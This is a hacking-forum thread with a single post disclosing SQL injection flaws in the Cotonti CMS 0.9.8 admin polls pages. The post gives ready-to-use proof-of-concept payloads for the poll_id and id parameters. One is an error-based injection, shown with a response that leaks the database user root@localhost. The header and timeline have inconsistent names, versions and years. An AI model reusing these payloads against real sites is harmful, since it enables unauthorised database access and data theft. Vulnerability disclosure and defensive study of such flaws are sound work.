Close

Results 1 to 1 of 1
Like Tree1Likes
  • 1 Post By vekt0r

Thread: SQL Injection in Cotonti 0.9.8

  1. #1
    Join Date
    Apr 2012
    Posts
    8
    Rep Power
    6

    SQL Injection in Cotonti 0.9.8

    # Exploit Title: SQL Injection in Contiti CMS 0.9.8
    # Date: 10/04/2012
    # Author: vekt0r
    # Software: Contiti CMS 0.9.8
    # Version: v3.5.1
    # Tested on: Windows XP, XAMPP

    Application Info:
    Cotonti combines the flexibility of a web framework with the rapid deployability and featureset of a content management system. Despite having features such as user accounts, content creation, file management and community tools out of the box, it can be easily extended using modules or plugins. Cotonti is powered by its own template engine which is both fast and easy to learn, even if you are not an experienced programmer.

    Vulnerability Details:
    The poll_id parameter in the admin area vulnerable to SQL injection. The page can be used to inject various injection strings to attack the underlying database. Also discovered in id parameter in Bump Poll functionality in admin area.

    Code:
    #####################################

    SQL injection 1
    POC - Throw SQL error
    x=e4b7f5c5a74f45a4&poll_id=16'&poll_text=test&poll _option[id31]=test&poll_option[id32]=test&poll_option[]=&poll_multiple=0&poll_state=0&poll_reset=0&poll_d elete=0

    POC - Error-Based

    x=e4b7f5c5a74f45a4&poll_id=16 AND (SELECT 1583 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,115,120,58),(MID((IFNU LL(CAST(CURRENT_USER() AS CHAR),CHAR(32))),1,50)),CHAR(58,122,112,103,58),FL OOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&poll_text=test&poll_option[id31]=test'&poll_option[id32]=test&poll_option[]=&poll_multiple=0&poll_state=0&poll_reset=0&poll_d elete=0

    Response:
    <h2 class="warning">Fatal error</h2><div class="warning">
    <p><em>2012-04-05 14:42</em></p><p>SQL error 23000: Integrity constraint violation: 1062 Duplicate entry ':xsx:root@localhost:zpg:1' for key 'group_key'</p><pre style="overflow:auto">#0 cot_diefatal(SQL error 23000: Integrity constraint violation: 1062 Duplicate entry ':xsx:root@localhost:zpg:1' for key 'group_key')

    SQL injection 2
    ID Parameter
    GET /cotonti-update/admin.php?m=polls&a=bump&id=125'&x=8f768a8788d1ef2 f


    Timeline:
    05-04-2012 Vulnerability discovered
    05-04-2011 Vendor notified, Additional instances discovered. Vendor fix implemented in latest branch (https://github.com/Cotonti/Cotonti/zipball/master)
    10-04-2012 Public disclosure
    Last edited by vekt0r; 10th April 2012 at 15:28.
    encrypt likes this.

Similar Threads

  1. [Question] SQL injection on port!?
    By aperfectcircle1 in forum General Hacking Discussions
    Replies: 3
    Last Post: 16th June 2010, 16:25
  2. delete with sql injection
    By ccoder in forum General Hacking Discussions
    Replies: 1
    Last Post: 9th May 2010, 18:52
  3. SQL Injection Tools
    By InterIdiot in forum Hacking Tools & Utilities
    Replies: 2
    Last Post: 12th March 2010, 15:39
  4. SQL Injection - From Bug to Shell
    By MaXe in forum Web Hacking & War Games
    Replies: 7
    Last Post: 19th October 2009, 23:44
  5. SQL Injection on Facebook
    By Erratum in forum Security News and Feeds
    Replies: 1
    Last Post: 3rd September 2009, 12:16

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •